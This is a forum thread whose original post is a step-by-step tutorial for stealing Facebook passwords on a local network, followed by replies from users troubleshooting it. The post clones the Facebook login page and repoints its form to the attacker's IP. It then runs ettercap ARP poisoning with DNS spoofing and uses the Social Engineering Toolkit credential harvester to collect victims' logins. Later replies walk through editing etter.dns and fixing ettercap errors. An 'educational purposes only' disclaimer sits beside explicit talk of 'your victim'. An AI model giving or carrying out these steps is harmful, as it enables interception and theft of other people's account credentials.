How to steal Facebook passwords

[OneHappyTaco]

This is for educational purposes only, I am only informing you how to avoid getting your passwords stolen. I am not responsible for anything you do.
I am going to show you how to steal Facebook passwords without any social engineering. This method is easier than most, and is one of the best way to steal SSL encrypted passwords!
You will need:
Ifile (sinfuliphonerepo.com)
Mobile Terminal (default cydia source) also have all the cmds added! (That means to type in "cmds" in search bar in cydia and download everything that pops up)
Ettercap no GTK (ininjas.com/repo)
Social Enigneering Toolkit (ininjas.com/repo)
Once you have all those things, you can begin!
First off go into your settings app and click "wifi"
Then click the blue arrow next to your wifi provider and write down the number next to "ip address"
Note: it should look something like this 192.168.x.x (the x.x's being some random number
open mobile terminal and type in:
su
alpine (defualt password)
Then type in:
cd /
Then type in
Wget www.facebook.com
This downloads the facebook login page
And wait for it to finish. Once finished exit out of mobile terminal and open ifile. When you first open it up, back out of the folders until you can't back up anymore. Then scroll down to the bottom and look for a file called "index.html"
Note: sometimes it is not called index.html so you might have to look at all the files located in cd / for the right one
Copy index.html and move it into /var/www
Note:you might have to make a "www" folder
Next click on the blue arrow located next to index.html. The click the button "open with" and select text viewer from the list. Now once the file opens click the search button and type in "action" and hit return. It should bring you to a line that says
action="https://www.facebook.com/login.php?login_attempt=1
You are going to edit this line to:
action="https://192.168.x.x/login.php?login_attempt=1"
Replacing the xx's with the end numbers of the ip address you wrote down.
Next save the file and now locate to: /usr/local/share/ettercap
Once there look for the file "etter.dns" and open it up in text viewer.
Next click the search button and type in "microsoft sucks" and click enter. You should see a couple lines of text saying something similar to this
"*.microsoft.com.                  A        (a whole bunch a numbers)
And then two more lines that have the word microsoft.
(sorry I already changed mine so I don't know exactly what the lines of text say so you'll have to make sense of things"
Delete the two lines of text below the line
*.microsoft.com                      A                   (a whole bunch a numbers)
Once those lines of numbers are deleted change the first line to
*.facebook.com                         A                     192.168.x.x
Replacing the xx's with the last two numbers of the up address you wrote down. Your done with the hard part!!!!!!!!!!
Now open up mobile terminal and type in the following
su
alpine
Then type in this exactly how you see it
ettercap -T -q -P dns_spoof -M arp // //
This redirects your victim from Facebook.com to your fake page that we will make In a moment!
In other words, whenever anyone types in Facebook.com into their address bar they go to a fake Facebook.com
Make sure you don't touch the page with the live stream from ettercap! You'll have to change pages of terminal by clicking the little two circles at the bottom of the screen of terminal. Now while that starts go into your second page of mobile terminal and type in this exactly how you see it
sysctl -w net.inet.ip.forwarding=1
This enables ip forwarding
Then after you type that in type in
cd /var/root/pentest/exploits/set
This goes to the social engineering toolkit directory!
Then type in:
./set
This runs set
Once loaded type in this
1
Then type in:
2
Then type in:
3
This loads the credential harvester from set
Then type in:
3
This loads the custom import option
It will ask you for your interface ip address... Type in 192.168.x.x replacing the xx's with the last two numbers you wrote down on the piece of paper
Next it asks for the location of the fake Facebook!
Type in:
/var/www/index.html
Then it asks for the actual website your trying to steal passwords from
Type in:
www.facebook.com
Then it should say something like "the best way to use this is by..."
Ignore it and press enter!
Now go on to your computer to test it! In the address bar type in "Facebook.com" and type in your fake user and pass and then go check your iPod to see if you got the user and pass! To do so, you must check the page that was using set! I should say, we got a hit, and the user and pass will be listed. If you can't scroll up to the part where it tells you the user and pass just press ^C to write a report located in /var/root/pentest/exploits/set/reports

I just wanted to say a quick thanks to APetrick for helping me with my noobish questions and A12danrulz for also helping me with noobish questions even though I have been a jerk.
I put a lot of work into this tutorial and I hope it shows!
P.s. what's green, white and red all over?

[Apetrick]

Good tutorial, I'll try this out later. BTW if you don't have the /var/www folder than you need to install lighttp from cydia

[Markanees]

good tut , i will try it +1

[OneHappyTaco]

Yeah I just tested it again, and I am very happy to say it works!!!!!!!!!!!! I don't know what it is... But this code doesn't work
ettercap -Tq -M arp // -P dns_spoof doesn't work but
Ettercap -T -q -P dns_spoof -M arp // // does!

[OneHappyTaco]

I was at -39.. But now I am at -40

[Markanees]

i couldn't make it work i am stuck at etter.dns step
can you make it more simple
i have
1    microsoft.com      A   198.182.196.56
2.   *.microsoft.com    A   198.182.196.56
3     www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed
that what i have which line to delet

[OneHappyTaco]

this is kind of confusing but... delelte line 3. then after you have deleted line three edit line 2 to:
*.facebook.com               A              192.168.x.x
and make the "A" line up with the "A" above it. then delete line 1.

[Markanees]

i didnt understand the last line

[OneHappyTaco]

make the "A" in the middle of "facebook" and 192.168.x.x line up with the "A" above it

[LankAsif]

OneHappyTaco I believe the "Ettercap -T -q -P dns_spoof -M arp // //" you posted is the same as the "ettercap -T -q -P dns_spoof -M arp // //" in your OP (other than case of "e" in "ettercap" and space between -T and q (with added "-" before q).
when ya say "ettercap -Tq -M arp // -P dns_spoof doesn't work" was "-Tq" a typo or what you typed in the test? Using ettercap i found (in the past) that the command with a lowercase "e" worked. so could you confirm if the "-Tq" was a typo or that it is what you used in the test? thanks man

sorry this post is so confusing

[OneHappyTaco]

the -Tq means text that is quiet in the help menu of ettercap

[LankAsif]

kk, but OP says -T -q not -Tq, so wondering why ya saying "-Tq" doesn't work when OP never mentioned it. I was just wondering. thanks man

[darrenliew96]

Can this work on the mobile version of facebook?
And it downloaded unsopportedbrowser file.

[darrenliew96]

Darren-Liews-iPhone:~ root# ettercap -Tq -M arp // -P dns_spoof
dyld: Library not loaded: /usr/local/lib/libltdl.7.dylib
  Referenced from: /usr/local/bin/ettercap
  Reason: image not found
Trace/BPT trap: 5
Darren-Liews-iPhone:~ root#

help please?

[OneHappyTaco]

Very good question. Try it on the mobile version to see. Also to fix the error get libnet from the repo.